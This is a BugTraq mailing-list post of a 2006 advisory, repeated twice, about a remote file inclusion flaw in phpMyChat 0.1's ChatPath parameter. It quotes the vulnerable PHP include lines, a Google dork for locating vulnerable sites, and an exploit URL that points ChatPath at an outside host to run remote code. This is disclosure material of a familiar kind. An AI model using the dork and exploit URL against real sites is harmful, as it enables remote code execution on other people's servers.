BugTraq
Back to list
|
Post reply
SolpotCrew Advisory #13 - phpMyChat 0.1 (ChatPath) Remote File Inclusion
Sep 26 2006 06:28AM
chris_hasibuan yahoo com
#############################SolpotCrew Community################################
#
# phpMyChat 0.1 (ChatPath) Remote File Inclusion
#
# vendor : http://www.phpheaven.net/phpmychat:home
#
########################################################################
#########
#
#
# Bug Found By :Solpot a.k.a (k. Hasibuan) (26-09-2006)
#
# contact: chris_hasibuan (at) yahoo (dot) com [email concealed]
#
# Website : http://www.nyubicrew.org/adv/solpot-adv-09.txt
#
########################################################################
########
#
#
# Greetz: choi , h4ntu , Ibnusina , r4dja , No-profile , begu , madkid
# robby , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa
# home_edition2001 , Rendy , cow_1seng , ^^KaBRuTz , bYu , Lappet-homo
# Blue|spy , cah|gemblung , Slacky , blind_boy , camagenta , XdikaX
# x-ace , Dalmet , th3sn0wbr4in , iFX , ^YoGa^ , Soey , vend3r , k1tk4t
# [K]ompoR_Meledu[K] , Scr3W_W0rM , TOMMY^PENGAMEN , Belaj4r, ^NakKuta
# and all member solpotcrew community @ http://nyubicrew.org/forum/
# especially thx to str0ke @ milw0rm.com
#
########################################################################
#######
Input passed to the "ChatPath" is not properly verified
before being used to include files. This can be exploited to execute
arbitrary PHP code by including files from local or external resources.
code from lib/connected_users.lib.php3
<?php
require("${ChatPath}config/config.lib.php3");
require("${ChatPath}lib/database/".C_DB_TYPE.".lib.php3");
require("${ChatPath}lib/clean.lib.php3");
function display_connected($Private,$Full,$String1,$String2)
Google Dork : inurl:register.php3?L=
Exploit : http://somehost/path_to_phpMyChat/lib/connected_users.lib.php3?ChatPath=
http://injek-pala-lappet?
##############################MY LOVE JUST FOR U RIE#########################
######################################E.O.F#############################
#####
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
#
# phpMyChat 0.1 (ChatPath) Remote File Inclusion
#
# vendor : http://www.phpheaven.net/phpmychat:home
#
########################################################################
#########
#
#
# Bug Found By :Solpot a.k.a (k. Hasibuan) (26-09-2006)
#
# contact: chris_hasibuan (at) yahoo (dot) com [email concealed]
#
# Website : http://www.nyubicrew.org/adv/solpot-adv-09.txt
#
########################################################################
########
#
#
# Greetz: choi , h4ntu , Ibnusina , r4dja , No-profile , begu , madkid
# robby , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa
# home_edition2001 , Rendy , cow_1seng , ^^KaBRuTz , bYu , Lappet-homo
# Blue|spy , cah|gemblung , Slacky , blind_boy , camagenta , XdikaX
# x-ace , Dalmet , th3sn0wbr4in , iFX , ^YoGa^ , Soey , vend3r , k1tk4t
# [K]ompoR_Meledu[K] , Scr3W_W0rM , TOMMY^PENGAMEN , Belaj4r, ^NakKuta
# and all member solpotcrew community @ http://nyubicrew.org/forum/
# especially thx to str0ke @ milw0rm.com
#
########################################################################
#######
Input passed to the "ChatPath" is not properly verified
before being used to include files. This can be exploited to execute
arbitrary PHP code by including files from local or external resources.
code from lib/connected_users.lib.php3
<?php
require("${ChatPath}config/config.lib.php3");
require("${ChatPath}lib/database/".C_DB_TYPE.".lib.php3");
require("${ChatPath}lib/clean.lib.php3");
function display_connected($Private,$Full,$String1,$String2)
Google Dork : inurl:register.php3?L=
Exploit : http://somehost/path_to_phpMyChat/lib/connected_users.lib.php3?ChatPath=
http://injek-pala-lappet?
##############################MY LOVE JUST FOR U RIE#########################
######################################E.O.F#############################
#####
[ reply ]